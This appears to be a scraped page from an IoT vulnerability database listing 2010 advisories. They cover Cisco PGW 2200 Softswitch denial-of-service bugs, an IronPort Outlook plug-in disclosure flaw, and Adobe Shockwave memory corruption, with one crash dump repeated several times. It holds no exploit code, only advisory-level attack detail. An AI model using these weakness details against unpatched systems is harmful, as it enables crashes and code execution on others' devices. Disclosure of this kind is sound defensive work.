VARIoT IoT vulnerabilities database
| VAR-201005-0072 | CVE-2010-0603 | Cisco PGW 2200 Softswitch of SIP Service disruption in implementation (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The SIP implementation on the Cisco PGW 2200 Softswitch with software before 9.7(3)S10 allows remote attackers to cause a denial of service (device crash) via a malformed session attribute, aka Bug ID CSCsk40030. Cisco PGW 2200 Softswitch is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause an affected device to crash, effectively denying service to a legitimate user. This issue is tracked by Cisco BugID CSCsk40030.
NOTE: This issue was previously documented in BID 40110 (Cisco PGW 2200 Softswitch Multiple Denial of Service Vulnerabilities), but has been given its own record to better document it. The Cisco PGW 2200 is a carrier-grade software switch that can be used to perform call control in NGN and IMS infrastructures. The bug ID is CSCsk40030. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Multiple vulnerabilities in Cisco PGW Softswitch
Document ID: 111870
Advisory ID: cisco-sa-20100512-pgw
http://www.cisco.com/warp/public/707/cisco-sa-20100512-pgw.shtml
Revision 1.0
For Public Release 2010 May 12 1600 UTC (GMT)
- ---------------------------------------------------------------------
Summary
=======
Multiple vulnerabilities exist in the Cisco PGW 2200 Softswitch
series of products. Each vulnerability described in this advisory is
independent from other. The vulnerabilities are related to processing
Session Initiation Protocol (SIP) or Media Gateway Control Protocol
(MGCP) messages.
Successful exploitation of all but one of these vulnerabilities can
crash the affected device. Exploitation of the remaining
vulnerability will not crash the affected device, but it can lead to
a denial-of-service (DoS) condition in which no new TCP-based
connections will be accepted or created.
Cisco has released free software updates that address these
vulnerabilities. There are no workarounds that mitigate these
vulnerabilities.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20100512-pgw.shtml
Affected Products
=================
Vulnerable Products
+------------------
The Cisco PGW 2200 Softswitch is affected by these vulnerabilities.
The following table displays information about software releases that
are affected by individual vulnerabilities. Each vulnerability in the
table affects all software releases prior to the release that is
listed in the table.
+---------------------------------------+
| Cisco Bug | Affects All Software |
| ID | Releases Prior This |
| | Version(s) |
|------------+--------------------------|
| CSCsz13590 | 9.8(1)S5 |
|------------+--------------------------|
| CSCsl39126 | 9.7(3)S11 |
|------------+--------------------------|
| CSCsk32606 | 9.7(3)S11 |
|------------+--------------------------|
| CSCsk44115 | 9.7(3)S11, 9.7(3)P11 |
|------------+--------------------------|
| CSCsk40030 | 9.7(3)S10 |
|------------+--------------------------|
| CSCsk38165 | 9.7(3)S10 |
|------------+--------------------------|
| CSCsj98521 | 9.7(3)S9, 9.7(3)P9 |
|------------+--------------------------|
| CSCsk04588 | 9.7(3)S9, 9.7(3)P9 |
|------------+--------------------------|
| CSCsk13561 | 9.7(3)S9, 9.7(3)P9 |
+---------------------------------------+
To determine the software version running on a Cisco product, log in
to the device and issue the RTRV-NE command. This command displays
information about the Cisco PGW 2200 Softswitch hardware, software,
and current state.
The following example identifies a Cisco PGW 2200 Softswitch running
software release 9.7(3):
mml> RTRV-NE
Media Gateway Controller - MGC-01 2010-04-23 11:55:00.000
M RTRV
"Type:MGC (Switch Mode)"
"Hardware platform:sun4u sparc SUNW,Sun-Fire-V210"
"Vendor:"Cisco Systems, Inc.""
"Location:MGC-01 - Media Gateway Controller"
"Version:"9.7(3)""
"Patch:"CSCOgs028/CSCOnn028""
"Platform State:ACTIVE"
;
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities. In particular, Cisco IOS Software is not affected by
these vulnerabilities.
Details
=======
SIP is a popular signaling protocol used to manage voice and video
calls across IP networks such as the Internet. SIP is responsible for
handling all aspects of call setup and termination. Voice and video
are the most popular types of sessions that SIP handles, but the
protocol is flexible to accommodate for other applications that
require call setup and termination. SIP call signaling can use UDP
(port 5060), TCP (port 5060), or Transport Layer Security (TLS; TCP
port 5061) as the underlying transport protocol.
MGCP is the protocol for controlling telephony gateways from external
call control elements known as media gateway controllers or call
agents. A telephony gateway is a network element that provides
conversion between the audio signals carried on telephone circuits
and data packets carried over the Internet or other packet networks.
Multiple DoS vulnerabilities exist in the Cisco PGW 2200 Softswitch
SIP implementation, and one vulnerability is in the MGCP
implementation.
The following vulnerabilities can cause affected devices to crash:
* CSCsl39126 (registered customers only), CVE ID CVE-2010-0601
* CSCsk32606 (registered customers only), CVE ID CVE-2010-0602
* CSCsk40030 (registered customers only), CVE ID CVE-2010-0603
* CSCsk38165 (registered customers only), CVE ID CVE-2010-0604
* CSCsk44115 (registered customers only), CVE ID CVE-2010-1561
* CSCsj98521 (registered customers only), CVE ID CVE-2010-1562
* CSCsk04588 (registered customers only), CVE ID CVE-2010-1563
* CSCsz13590 (registered customers only), CVE ID CVE-2010-1567
The following vulnerability may cause an affected device to be unable
to accept or create a new TCP connection. Existing calls will not be
terminated, but no new SIP connections will be established. If
exploited, this vulnerability will also prevent the device from
establishing any new HTTP, SSH or Telnet sessions.
* CSCsk13561 (registered customers only), CVE ID CVE-2010-1565
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this security advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCsl39126 - Malformed MGCP packet can crash device
CVSS Base Score - 7.8
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact None
Integrity Impact None
Availability Impact Complete
CVSS Temporal Score - 6.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCsk32606 - Malformed SIP packet can crash device
CSCsk40030 - Malformed Session Attribute can crash device
CSCsk38165 - Device crash during SIP testing
CSCsk44115 - Device crash while processing overly long message
CSCsj98521 - Device crash while processing malformed Contact Header
CSCsk04588 - Device crash while processing malformed header
CSCsz13590 - Malformed SIP header can crash device
CVSS Base Score - 7.8
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact None
Integrity Impact None
Availability Impact Complete
CVSS Temporal Score - 6.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCsk13561 - Exhaustion of TCP sockets prevents device from accepting
new connections
CVSS Base Score - 7.8
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact None
Integrity Impact None
Availability Impact Complete
CVSS Temporal Score - 6.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
Impact
======
Successful exploitation of all but one vulnerability in this advisory
can crash the affected device. The remaining vulnerability will not
crash the affected device, but it can lead to a DoS condition in
which no new TCP-based connections will be accepted or created.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
All vulnerabilities listed in this Security Advisory are addressed in
Cisco PGW 2200 Softswitch version 9.7(3)S11, version 9.8(1)S5, and
subsequent, software releases.
Workarounds
===========
There are no workarounds for the vulnerabilities in this advisory.
In the case of the vulnerability that corresponds to Cisco Bug ID
CSCsk13561, administrator must manually reboot the affected device to
restore the device's ability to accept new connections. Because
vulnerability prevents new TCP-based session to be created, this
reboot can be initiated only from the console. If a failover device
is configured, existing sessions will continue while the affected
device is reloading. Without a failover device, all active sessions
will be terminated while the affected device is reloading.
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20100512-pgw.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20100512-pgw.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2010-May-12 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices.
All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (Darwin)
iEYEARECAAYFAkvqxeUACgkQ86n/Gc8U/uDSSACaAkFu2uZrHTxH/nHA+t3EH05g
3LcAnjmSVqwTjrB3Ck5IuAopPY2iBssX
=dBOb
-----END PGP SIGNATURE-----
| VAR-201005-0332 | CVE-2010-1568 | Cisco IronPort Desktop Flag Plug-in for Outlook of Send Secure Vulnerability in retrieving plain text content of e-mail in the function |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Send Secure functionality in the Cisco IronPort Desktop Flag Plug-in for Outlook before 6.5.0-006 does not properly handle simultaneously composed messages, which might allow remote attackers to obtain cleartext contents of e-mail messages that were intended to be encrypted, aka bug 65623. Cisco IronPort Desktop Flag Plug-in for Outlook is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information that may lead to further attacks.
Cisco IronPort Desktop Flag Plug-in for Outlook versions 6.2.4.3, up to but not including 6.5.0-006, are vulnerable.
This issue is being tracked by Cisco IronPort bug 65623
| VAR-201005-0110 | CVE-2010-1291 | Adobe Shockwave Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Shockwave Player before 11.5.7.609 allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-1284, CVE-2010-1286, CVE-2010-1287, CVE-2010-1289, and CVE-2010-1290. Adobe Shockwave Player is prone to a memory-corruption vulnerability.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0109 | CVE-2010-1290 | Adobe Shockwave Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Shockwave Player before 11.5.7.609 allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-1284, CVE-2010-1286, CVE-2010-1287, CVE-2010-1289, and CVE-2010-1291. Adobe Shockwave Player is prone to a memory-corruption vulnerability.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0108 | CVE-2010-1289 | Adobe Shockwave Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Shockwave Player before 11.5.7.609 allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-1284, CVE-2010-1286, CVE-2010-1287, CVE-2010-1290, and CVE-2010-1291. Adobe Shockwave Player is prone to an unspecified remote code-execution vulnerability. Failed exploit attempts will likely result in denial-of-service conditions.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
